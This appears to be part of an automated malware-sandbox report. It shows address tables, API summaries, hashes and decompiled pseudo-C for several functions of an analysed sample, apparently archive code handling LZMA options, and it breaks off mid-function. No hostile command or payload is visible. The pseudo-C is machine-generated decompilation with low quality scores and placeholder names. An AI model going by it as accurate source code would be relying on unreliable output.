                                                                                                                    0x00b7678b
                                                                                                                    0x00b7678b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b76793
                                                                                                                    0x00b76795
                                                                                                                    0x00b767a0
                                                                                                                    0x00b76420
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b767a0
                                                                                                                    0x00b766b2
                                                                                                                    0x00b765ed
                                                                                                                    0x00000000
                                                                                                                    0x00b765e1
                                                                                                                    0x00b767b9
                                                                                                                    0x00b767c2
                                                                                                                    0x00b767cc
                                                                                                                    0x00b767cc
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B77D90: WaitForSingleObject.KERNEL32(?,000000FF,00B29D84,?), ref: 00B77D93
                                                                                                                      • Part of subcall function 00B77D90: GetLastError.KERNEL32(?,000000FF,00B29D84,?), ref: 00B77D9E
                                                                                                                      • Part of subcall function 00B76CA0: EnterCriticalSection.KERNEL32(?,?,?,00B76439), ref: 00B76CA8
                                                                                                                      • Part of subcall function 00B76CA0: LeaveCriticalSection.KERNEL32(?,?,?,00B76439), ref: 00B76CB2
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B765FE
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B76618
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B76682
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B766A8
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B7670E
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B76746
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2116739831-0
                                                                                                                    • Opcode ID: bdbf2c2a2c744b170bdf75974c3661001fe7f10f646eeb864731dd4624c8ab5d
                                                                                                                    • Instruction ID: b0b593bf0e181cd64ba7a01087c41464554697547d110e9d110a7a858d261ab1
                                                                                                                    • Opcode Fuzzy Hash: bdbf2c2a2c744b170bdf75974c3661001fe7f10f646eeb864731dd4624c8ab5d
                                                                                                                    • Instruction Fuzzy Hash: B2C14575204B058FC724DF28C580BA7B7E2FF98354F148A6DE9AE87251EB30E949CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B1ADA1 Relevance: 7.6, APIs: 6, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 61%
                                                                                                                    			E00B1ADA1(void* __eax, signed int _a4, intOrPtr _a8, signed int* _a12) {
				signed int _t15;
				void* _t18;
				signed int _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t24;

				_t24 = _a12;
				_t23 = _a8;
				 *_t24 =  *_t24 & 0x00000000;
				_t18 = 0x10;
				_push(_t18);
				_push(0xb8fe10);
				_push(_t23);
				L00B7F304();
				if(__eax != 0) {
					_push(_t18);
					_push(0xb8d000);
					_push(_t23);
					L00B7F304();
					if(__eax == 0) {
						goto L1;
					}
					_push(_t18);
					_push(0xb8d020);
					_push(_t23);
					L00B7F304();
					if(__eax != 0) {
						_push(_t18);
						_push(0xb8d040);
						_push(_t23);
						L00B7F304();
						if(__eax != 0) {
							_push(_t18);
							_push(0xb8d050);
							_push(_t23);
							L00B7F304();
							if(__eax != 0) {
								_push(_t18);
								_push(0xb8d060);
								_push(_t23);
								L00B7F304();
								if(__eax != 0) {
									return 0x80004002;
								}
								_t15 = _a4;
								_t19 = _t15;
								_t22 = _t15 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t24 =  ~_t19 & _t22;
								L12:
								 *((intOrPtr*)(_t15 + 0x14)) =  *((intOrPtr*)(_t15 + 0x14)) + 1;
								return 0;
							}
							_t15 = _a4;
							_t19 = _t15;
							_t22 = _t15 + 0xc;
							goto L11;
						}
						_t15 = _a4;
						_t19 = _t15;
						_t22 = _t15 + 8;
						goto L11;
					}
					_t15 = _a4;
					_t19 = _t15;
					_t22 = _t15 + 4;
					goto L11;
				}
				L1:
				_t15 = _a4;
				 *_t24 = _t15;
				goto L12;
			}









                                                                                                                    0x00b1ada6
                                                                                                                    0x00b1adaa
                                                                                                                    0x00b1adaf
                                                                                                                    0x00b1adb2
                                                                                                                    0x00b1adb3
                                                                                                                    0x00b1adb4
                                                                                                                    0x00b1adb9
                                                                                                                    0x00b1adba
                                                                                                                    0x00b1adc4
                                                                                                                    0x00b1add0
                                                                                                                    0x00b1add1
                                                                                                                    0x00b1add6
                                                                                                                    0x00b1add7
                                                                                                                    0x00b1ade1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b1ade3
                                                                                                                    0x00b1ade4
                                                                                                                    0x00b1ade9
                                                                                                                    0x00b1adea
                                                                                                                    0x00b1adf4
                                                                                                                    0x00b1ae00
                                                                                                                    0x00b1ae01
                                                                                                                    0x00b1ae06
                                                                                                                    0x00b1ae07
                                                                                                                    0x00b1ae11
                                                                                                                    0x00b1ae1d
                                                                                                                    0x00b1ae1e
                                                                                                                    0x00b1ae23
                                                                                                                    0x00b1ae24
                                                                                                                    0x00b1ae2e
                                                                                                                    0x00b1ae3a
                                                                                                                    0x00b1ae3b
                                                                                                                    0x00b1ae40
                                                                                                                    0x00b1ae41
                                                                                                                    0x00b1ae4b
                                                                                                                    0x00000000
                                                                                                                    0x00b1ae64
                                                                                                                    0x00b1ae4d
                                                                                                                    0x00b1ae50
                                                                                                                    0x00b1ae52
                                                                                                                    0x00b1ae55
                                                                                                                    0x00b1ae57
                                                                                                                    0x00b1ae5b
                                                                                                                    0x00b1ae5d
                                                                                                                    0x00b1ae5d
                                                                                                                    0x00000000
                                                                                                                    0x00b1ae60
                                                                                                                    0x00b1ae30
                                                                                                                    0x00b1ae33
                                                                                                                    0x00b1ae35
                                                                                                                    0x00000000
                                                                                                                    0x00b1ae35
                                                                                                                    0x00b1ae13
                                                                                                                    0x00b1ae16
                                                                                                                    0x00b1ae18
                                                                                                                    0x00000000
                                                                                                                    0x00b1ae18
                                                                                                                    0x00b1adf6
                                                                                                                    0x00b1adf9
                                                                                                                    0x00b1adfb
                                                                                                                    0x00000000
                                                                                                                    0x00b1adfb
                                                                                                                    0x00b1adc6
                                                                                                                    0x00b1adc6
                                                                                                                    0x00b1adc9
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1475443563-0
                                                                                                                    • Opcode ID: d61a9702bb3c95b816164da9a81d17322abfd84c737205a3a120f9f2f82d3198
                                                                                                                    • Instruction ID: 6d39f7aef7df8cc9ea4f2fd492770a7262e5a1c4d8e3800e4b760bb7f2c311ba
                                                                                                                    • Opcode Fuzzy Hash: d61a9702bb3c95b816164da9a81d17322abfd84c737205a3a120f9f2f82d3198
                                                                                                                    • Instruction Fuzzy Hash: 0A2192B2700205BBE7149A10DC81FFB33EDDB51794F6184AAFD09DB251F660FD8186A6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6C7C0 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B6C7C0(int* __esi) {
				int _t30;
				int* _t31;

				_t31 = __esi;
				_t30 = 0;
				if(__esi[5] == 0) {
					if(__esi[7] == 0) {
						exit(1);
					}
					LeaveCriticalSection( &(_t31[0xe]));
					_t30 =  *_t31;
					_t10 = _t30 + 1; // 0x1
					 *_t31 = _t10;
					_t31[7] = 0;
					L00B77FE0( &(_t31[0xc]));
				} else {
					if(__esi[7] != 0) {
						exit(1);
					}
					 *_t31 = 1;
					_t31[5] = 0;
					_t31[9] = 0;
					_t31[8] = 0;
					L00B77ED0( &(_t31[0xb]));
					L00B77EB0( &(_t31[0xa]));
				}
				L00B77D90(_t31[0xd]);
				if(_t31[7] != 0) {
					exit(1);
				}
				EnterCriticalSection( &(_t31[0xe]));
				_t31[7] = 1;
				return _t30;
			}





                                                                                                                    0x00b6c7c0
                                                                                                                    0x00b6c7c4
                                                                                                                    0x00b6c7c9
                                                                                                                    0x00b6c7fb
                                                                                                                    0x00b6c7ff
                                                                                                                    0x00b6c7ff
                                                                                                                    0x00b6c808
                                                                                                                    0x00b6c80e
                                                                                                                    0x00b6c810
                                                                                                                    0x00b6c813
                                                                                                                    0x00b6c818
                                                                                                                    0x00b6c81b
                                                                                                                    0x00b6c7cb
                                                                                                                    0x00b6c7ce
                                                                                                                    0x00b6c7d2
                                                                                                                    0x00b6c7d2
                                                                                                                    0x00b6c7da
                                                                                                                    0x00b6c7e0
                                                                                                                    0x00b6c7e3
                                                                                                                    0x00b6c7e6
                                                                                                                    0x00b6c7e9
                                                                                                                    0x00b6c7f1
                                                                                                                    0x00b6c7f1
                                                                                                                    0x00b6c823
                                                                                                                    0x00b6c82b
                                                                                                                    0x00b6c82f
                                                                                                                    0x00b6c82f
                                                                                                                    0x00b6c838
                                                                                                                    0x00b6c841
                                                                                                                    0x00b6c849

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: exit$CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 43521-0
                                                                                                                    • Opcode ID: f5ee8b8a1f81e5ec47f051e0f03904d81d2f25aae9905188e88c0f91b85171dd
                                                                                                                    • Instruction ID: c42802c6991bcf880de8201cac2593df460a42c97ef433e02d2239d8816c7a05
                                                                                                                    • Opcode Fuzzy Hash: f5ee8b8a1f81e5ec47f051e0f03904d81d2f25aae9905188e88c0f91b85171dd
                                                                                                                    • Instruction Fuzzy Hash: F4112371001B01CFC730AF62D881976FBF4BF54304B008A6EE1AB42A51DB75B589CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B58383 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E00B58383() {
				void* __edi;
				intOrPtr _t77;
				signed int _t78;
				signed char _t79;
				void* _t81;
				void* _t83;
				signed int _t84;
				signed char _t85;
				signed int _t87;
				signed char _t88;
				signed char _t90;
				signed char _t92;
				void* _t93;
				signed char _t94;
				void* _t95;
				intOrPtr _t99;
				void* _t109;
				signed char _t110;
				signed int _t111;
				signed int _t117;
				signed int _t123;
				signed int _t125;
				signed int _t137;
				intOrPtr _t138;
				signed int _t144;
				intOrPtr _t149;
				signed char _t150;
				void* _t151;
				void* _t153;
				void* _t156;

				L00B7F140(0xb87670, _t151);
				_t144 = 0;
				 *((intOrPtr*)(_t151 - 0x10)) = _t153 - 0x38;
				 *((intOrPtr*)(_t151 - 4)) = 0;
				 *((short*)(_t151 - 0x34)) = 0;
				 *((short*)(_t151 - 0x32)) = 0;
				 *((intOrPtr*)(_t151 - 0x2c)) = 0;
				_t77 =  *((intOrPtr*)(_t151 + 0xc));
				 *((char*)(_t151 - 4)) = 1;
				_t156 = _t77 - 0x2c;
				if(_t156 > 0) {
					_t78 = _t77 - 0x2d;
					__eflags = _t78;
					if(_t78 == 0) {
						_t79 =  *(_t151 + 8);
						_push( *((intOrPtr*)(_t79 + 0x1ec)));
						_push( *((intOrPtr*)(_t79 + 0x1e8)));
						goto L56;
					} else {
						_t84 = _t78 - 0x1a;
						__eflags = _t84;
						if(_t84 == 0) {
							_t85 =  *(_t151 + 8);
							__eflags =  *((char*)(_t85 + 0x1f8));
							if( *((char*)(_t85 + 0x1f8)) == 0) {
								_t144 = 1;
							}
							__eflags =  *((char*)(_t85 + 0x1fa));
							if( *((char*)(_t85 + 0x1fa)) != 0) {
								_t144 = _t144 | 0x00000002;
								__eflags = _t144;
							}
							__eflags =  *((char*)(_t85 + 0x1fb));
							if( *((char*)(_t85 + 0x1fb)) != 0) {
								_t144 = _t144 | 0x00000020;
								__eflags = _t144;
							}
							__eflags =  *((char*)(_t85 + 0x1fe));
							if( *((char*)(_t85 + 0x1fe)) != 0) {
								_t144 = _t144 | 0x00000100;
								__eflags = _t144;
							}
							_push(_t144);
							goto L54;
						} else {
							_t87 = _t84 - 1;
							__eflags = _t87;
							if(_t87 == 0) {
								_t88 =  *(_t151 + 8);
								_t123 = 0;
								__eflags =  *(_t88 + 0x1fc);
								if( *(_t88 + 0x1fc) != 0) {
									_t123 = 2;
								}
								__eflags =  *((char*)(_t88 + 0x1fd));
								if( *((char*)(_t88 + 0x1fd)) != 0) {
									_t123 = _t123 | 0x00000001;
									__eflags = _t123;
								}
								__eflags = _t123 - _t144;
								if(_t123 != _t144) {
									_push(_t123);
									goto L54;
								}
							} else {
								__eflags = _t87 == 0x15;
								if(_t87 == 0x15) {
									_t90 =  *(_t151 + 8);
									__eflags =  *((char*)(_t90 + 0x1fa));
									if( *((char*)(_t90 + 0x1fa)) != 0) {
										L37:
										_push(1);
										goto L38;
									} else {
										__eflags =  *((char*)(_t90 + 0x1fb));
										if( *((char*)(_t90 + 0x1fb)) != 0) {
											goto L37;
										} else {
											__eflags =  *((char*)(_t90 + 0x1fc));
											if( *((char*)(_t90 + 0x1fc)) != 0) {
												goto L37;
											} else {
												__eflags =  *((char*)(_t90 + 0x1fe));
												if( *((char*)(_t90 + 0x1fe)) != 0) {
													goto L37;
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					if(_t156 == 0) {
						_t92 =  *(_t151 + 8);
						_push( *((intOrPtr*)(_t92 + 0x1f4)));
						_push( *((intOrPtr*)(_t92 + 0x1f0)));
						goto L56;
					} else {
						_t93 = _t77 - 0xd;
						if(_t93 == 0) {
							_t94 =  *(_t151 + 8);
							_t125 = 0;
							__eflags = 0;
							_t138 =  *((intOrPtr*)(_t94 + 0xb4));
							while(1) {
								__eflags = _t125 - _t138;
								if(_t125 >= _t138) {
									break;
								}
								_t149 =  *((intOrPtr*)(_t94 + 0xd4));
								__eflags =  *((intOrPtr*)(_t149 + _t125 * 4)) - 1;
								if( *((intOrPtr*)(_t149 + _t125 * 4)) > 1) {
									 *(_t151 + 8) = 1;
								} else {
									_t125 = _t125 + 1;
									continue;
								}
								L27:
								_push( *(_t151 + 8));
								L38:
								L00B1926F(_t151 - 0x34);
								goto L57;
							}
							_t46 = _t151 + 8;
							 *_t46 =  *(_t151 + 8) & 0x00000000;
							__eflags =  *_t46;
							goto L27;
						} else {
							_t95 = _t93 - 9;
							if(_t95 == 0) {
								E00B126D9(_t151 - 0x24);
								_t150 =  *(_t151 + 8);
								 *((char*)(_t151 - 4)) = 2;
								while(1) {
									__eflags = _t144 -  *((intOrPtr*)(_t150 + 0x100));
									if(_t144 >=  *((intOrPtr*)(_t150 + 0x100))) {
										break;
									}
									_t99 =  *((intOrPtr*)(_t150 + 0xfc));
									 *((intOrPtr*)(_t151 - 0x18)) =  *((intOrPtr*)(_t99 + _t144 * 8));
									_t117 =  *(_t99 + 4 + _t144 * 8);
									E00B12871(_t151 - 0x24);
									__eflags =  *((intOrPtr*)(_t151 - 0x18)) - 0x21;
									if( *((intOrPtr*)(_t151 - 0x18)) != 0x21) {
										L15:
										__eflags =  *((intOrPtr*)(_t151 - 0x18)) - 0x30101;
										if(__eflags != 0) {
											L18:
											_push(_t117);
											_push( *((intOrPtr*)(_t151 - 0x18)));
											_push(_t151 - 0x24);
											E00B58299(__eflags);
										} else {
											__eflags = _t117;
											if(__eflags != 0) {
												goto L18;
											} else {
												E00B12895(_t151 - 0x24, "LZMA:");
												E00B58609(_t151 - 0x44,  *((intOrPtr*)(_t150 + 0xf8)), _t144);
												goto L14;
											}
										}
									} else {
										__eflags = _t117;
										if(_t117 != 0) {
											goto L15;
										} else {
											E00B12895(_t151 - 0x24, "LZMA2:");
											E00B5867B(_t151 - 0x44,  *(_t150 + 0xf4) & 0x000000ff);
											L14:
											E00B12895(_t151 - 0x24, _t151 - 0x44);
										}
									}
									_t144 = _t144 + 1;
								}
								E00B11E89(L00B1922E(_t151 - 0x34,  *((intOrPtr*)(_t151 - 0x24))),  *((intOrPtr*)(_t151 - 0x24)));
							} else {
								_t109 = _t95 - 0xe;
								if(_t109 == 0) {
									_t110 =  *(_t151 + 8);
									_t137 =  *(_t110 + 0x1b0);
									_t111 =  *(_t110 + 0x1b4);
									__eflags = _t137 | _t111;
									if((_t137 | _t111) != 0) {
										_push(_t111);
										_push(_t137);
										L56:
										L00B192B9(_t151 - 0x34);
									}
								} else {
									if(_t109 == 0) {
										_push( *((intOrPtr*)( *(_t151 + 8) + 0xb4)));
										L54:
										L00B19294(_t151 - 0x34);
									}
								}
							}
						}
					}
				}
				L57:
				_t81 = L00B193EB(_t151 - 0x34,  *((intOrPtr*)(_t151 + 0x10)));
				L00B19312(_t151 - 0x34);
				_t83 = _t81;
				 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0xc));
				return _t83;
			}

































                                                                                                                    0x00b58388
                                                                                                                    0x00b58393
                                                                                                                    0x00b58395
                                                                                                                    0x00b58398
                                                                                                                    0x00b5839b
                                                                                                                    0x00b5839f
                                                                                                                    0x00b583a3
                                                                                                                    0x00b583a6
                                                                                                                    0x00b583a9
                                                                                                                    0x00b583ad
                                                                                                                    0x00b583b0
                                                                                                                    0x00b58515
                                                                                                                    0x00b58515
                                                                                                                    0x00b58518
                                                                                                                    0x00b585ca
                                                                                                                    0x00b585cd
                                                                                                                    0x00b585d3
                                                                                                                    0x00000000
                                                                                                                    0x00b5851e
                                                                                                                    0x00b5851e
                                                                                                                    0x00b5851e
                                                                                                                    0x00b58521
                                                                                                                    0x00b58589
                                                                                                                    0x00b5858c
                                                                                                                    0x00b58593
                                                                                                                    0x00b58597
                                                                                                                    0x00b58597
                                                                                                                    0x00b58598
                                                                                                                    0x00b5859f
                                                                                                                    0x00b585a1
                                                                                                                    0x00b585a1
                                                                                                                    0x00b585a1
                                                                                                                    0x00b585a4
                                                                                                                    0x00b585ab
                                                                                                                    0x00b585ad
                                                                                                                    0x00b585ad
                                                                                                                    0x00b585ad
                                                                                                                    0x00b585b0
                                                                                                                    0x00b585b7
                                                                                                                    0x00b585b9
                                                                                                                    0x00b585b9
                                                                                                                    0x00b585b9
                                                                                                                    0x00b585bf
                                                                                                                    0x00000000
                                                                                                                    0x00b58523
                                                                                                                    0x00b58523
                                                                                                                    0x00b58523
                                                                                                                    0x00b58524
                                                                                                                    0x00b58566
                                                                                                                    0x00b58569
                                                                                                                    0x00b5856b
                                                                                                                    0x00b58571
                                                                                                                    0x00b58575
                                                                                                                    0x00b58575
                                                                                                                    0x00b58576
                                                                                                                    0x00b5857d
                                                                                                                    0x00b5857f
                                                                                                                    0x00b5857f
                                                                                                                    0x00b5857f
                                                                                                                    0x00b58582
                                                                                                                    0x00b58584
                                                                                                                    0x00b58586
                                                                                                                    0x00000000
                                                                                                                    0x00b58586
                                                                                                                    0x00b58526
                                                                                                                    0x00b58526
                                                                                                                    0x00b58529
                                                                                                                    0x00b5852f
                                                                                                                    0x00b58532
                                                                                                                    0x00b58539
                                                                                                                    0x00b5855a
                                                                                                                    0x00b5855a
                                                                                                                    0x00000000
                                                                                                                    0x00b5853b
                                                                                                                    0x00b5853b
                                                                                                                    0x00b58542
                                                                                                                    0x00000000
                                                                                                                    0x00b58544
                                                                                                                    0x00b58544
                                                                                                                    0x00b5854b
                                                                                                                    0x00000000
                                                                                                                    0x00b5854d
                                                                                                                    0x00b5854d
                                                                                                                    0x00b58554
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58554
                                                                                                                    0x00b5854b
                                                                                                                    0x00b58542
                                                                                                                    0x00b58539
                                                                                                                    0x00b58529
                                                                                                                    0x00b58524
                                                                                                                    0x00b58521
                                                                                                                    0x00b583b6
                                                                                                                    0x00b583b6
                                                                                                                    0x00b58501
                                                                                                                    0x00b58504
                                                                                                                    0x00b5850a
                                                                                                                    0x00000000
                                                                                                                    0x00b583bc
                                                                                                                    0x00b583bc
                                                                                                                    0x00b583bf
                                                                                                                    0x00b584d4
                                                                                                                    0x00b584d7
                                                                                                                    0x00b584d7
                                                                                                                    0x00b584d9
                                                                                                                    0x00b584df
                                                                                                                    0x00b584df
                                                                                                                    0x00b584e1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b584e3
                                                                                                                    0x00b584e9
                                                                                                                    0x00b584ed
                                                                                                                    0x00b584f2
                                                                                                                    0x00b584ef
                                                                                                                    0x00b584ef
                                                                                                                    0x00000000
                                                                                                                    0x00b584ef
                                                                                                                    0x00b584fc
                                                                                                                    0x00b584fc
                                                                                                                    0x00b5855c
                                                                                                                    0x00b5855f
                                                                                                                    0x00000000
                                                                                                                    0x00b5855f
                                                                                                                    0x00b584f8
                                                                                                                    0x00b584f8
                                                                                                                    0x00b584f8
                                                                                                                    0x00000000
                                                                                                                    0x00b583c5
                                                                                                                    0x00b583c5
                                                                                                                    0x00b583c8
                                                                                                                    0x00b58408
                                                                                                                    0x00b5840d
                                                                                                                    0x00b58410
                                                                                                                    0x00b58414
                                                                                                                    0x00b58414
                                                                                                                    0x00b5841a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58420
                                                                                                                    0x00b58429
                                                                                                                    0x00b5842f
                                                                                                                    0x00b58433
                                                                                                                    0x00b58438
                                                                                                                    0x00b5843c
                                                                                                                    0x00b5846c
                                                                                                                    0x00b5846c
                                                                                                                    0x00b58473
                                                                                                                    0x00b58496
                                                                                                                    0x00b58496
                                                                                                                    0x00b5849a
                                                                                                                    0x00b5849f
                                                                                                                    0x00b584a0
                                                                                                                    0x00b58475
                                                                                                                    0x00b58475
                                                                                                                    0x00b58477
                                                                                                                    0x00000000
                                                                                                                    0x00b58479
                                                                                                                    0x00b58481
                                                                                                                    0x00b5848f
                                                                                                                    0x00000000
                                                                                                                    0x00b5848f
                                                                                                                    0x00b58477
                                                                                                                    0x00b5843e
                                                                                                                    0x00b5843e
                                                                                                                    0x00b58440
                                                                                                                    0x00000000
                                                                                                                    0x00b58442
                                                                                                                    0x00b5844a
                                                                                                                    0x00b58459
                                                                                                                    0x00b5845e
                                                                                                                    0x00b58465
                                                                                                                    0x00b58465
                                                                                                                    0x00b58440
                                                                                                                    0x00b584a5
                                                                                                                    0x00b584a5
                                                                                                                    0x00b584b9
                                                                                                                    0x00b583ca
                                                                                                                    0x00b583ca
                                                                                                                    0x00b583cd
                                                                                                                    0x00b583e5
                                                                                                                    0x00b583e8
                                                                                                                    0x00b583ee
                                                                                                                    0x00b583f6
                                                                                                                    0x00b583f8
                                                                                                                    0x00b583fe
                                                                                                                    0x00b583ff
                                                                                                                    0x00b585d9
                                                                                                                    0x00b585dc
                                                                                                                    0x00b585dc
                                                                                                                    0x00b583cf
                                                                                                                    0x00b583d1
                                                                                                                    0x00b583da
                                                                                                                    0x00b585c0
                                                                                                                    0x00b585c3
                                                                                                                    0x00b585c3
                                                                                                                    0x00b583d1
                                                                                                                    0x00b583cd
                                                                                                                    0x00b583c8
                                                                                                                    0x00b583bf
                                                                                                                    0x00b583b6
                                                                                                                    0x00b585e1
                                                                                                                    0x00b585e7
                                                                                                                    0x00b585f1
                                                                                                                    0x00b585f6
                                                                                                                    0x00b585fd
                                                                                                                    0x00b58606

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: !$LZMA2:$LZMA:
                                                                                                                    • API String ID: 3519838083-3332058968
                                                                                                                    • Opcode ID: a09bc207f781ff139413d717a9cb9311315a0f9f36bb5e8537dc2aafe63885a3
                                                                                                                    • Instruction ID: 1922f687314b7159cda9bd2f5c0d9fac96fdbc0a8b15e3c92b91448c3f87a357
                                                                                                                    • Opcode Fuzzy Hash: a09bc207f781ff139413d717a9cb9311315a0f9f36bb5e8537dc2aafe63885a3
                                                                                                                    • Instruction Fuzzy Hash: 9E616C7190414AEEDB16DB64D985BFD7BE1EF24306F1440E9EC067B262EB709E88CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B5A6EF Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B5A6EF(void* __ecx) {
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t83;
				void* _t98;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t110;

				L00B7F140(0xb877ac, _t110);
				_t106 = __ecx;
				E00B12DD3(_t110 - 0x1c,  *((intOrPtr*)(_t110 + 8)));
				 *((intOrPtr*)(_t110 - 4)) = 0;
				_t46 = E00B122CE( *((intOrPtr*)(_t110 - 0x1c)));
				if( *((intOrPtr*)(_t110 - 0x18)) == 0) {
					L5:
					_t107 = 0x80070057;
					L37:
					E00B11E89(_t46,  *((intOrPtr*)(_t110 - 0x1c)));
					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
					return _t107;
				}
				if( *((short*)( *((intOrPtr*)(_t110 - 0x1c)))) != 0x73) {
					_t50 = L00B1D051(_t110 - 0x1c, _t110 - 0x10);
					_t104 =  *((intOrPtr*)(_t110 + 0xc));
					__eflags = _t50;
					if(_t50 != 0) {
						L35:
						_push(_t104);
						_push( *((intOrPtr*)(_t110 - 0x1c)));
						_t46 = L00B4F752(_t106);
						L36:
						_t107 = _t46;
						goto L37;
					}
					_t51 = E00B123F5( *((intOrPtr*)(_t110 - 0x1c)), "rsfx");
					__eflags = _t51;
					if(_t51 == 0) {
						_t52 = E00B123F5( *((intOrPtr*)(_t110 - 0x1c)), "hc");
						__eflags = _t52;
						if(_t52 == 0) {
							_t53 = E00B123F5( *((intOrPtr*)(_t110 - 0x1c)), "hcf");
							__eflags = _t53;
							if(_t53 == 0) {
								_t54 = E00B123F5( *((intOrPtr*)(_t110 - 0x1c)), "he");
								__eflags = _t54;
								if(_t54 == 0) {
									_push(_t110 + 0xf);
									_push(_t104);
									_push(_t110 - 0x1c);
									_t46 = L00B4F93A(_t106 + 0x80);
									__eflags = _t46;
									if(_t46 != 0) {
										goto L36;
									}
									__eflags =  *((intOrPtr*)(_t110 + 0xf));
									if( *((intOrPtr*)(_t110 + 0xf)) == 0) {
										__eflags = E00B123F5( *((intOrPtr*)(_t110 - 0x1c)), "tr");
										if(__eflags == 0) {
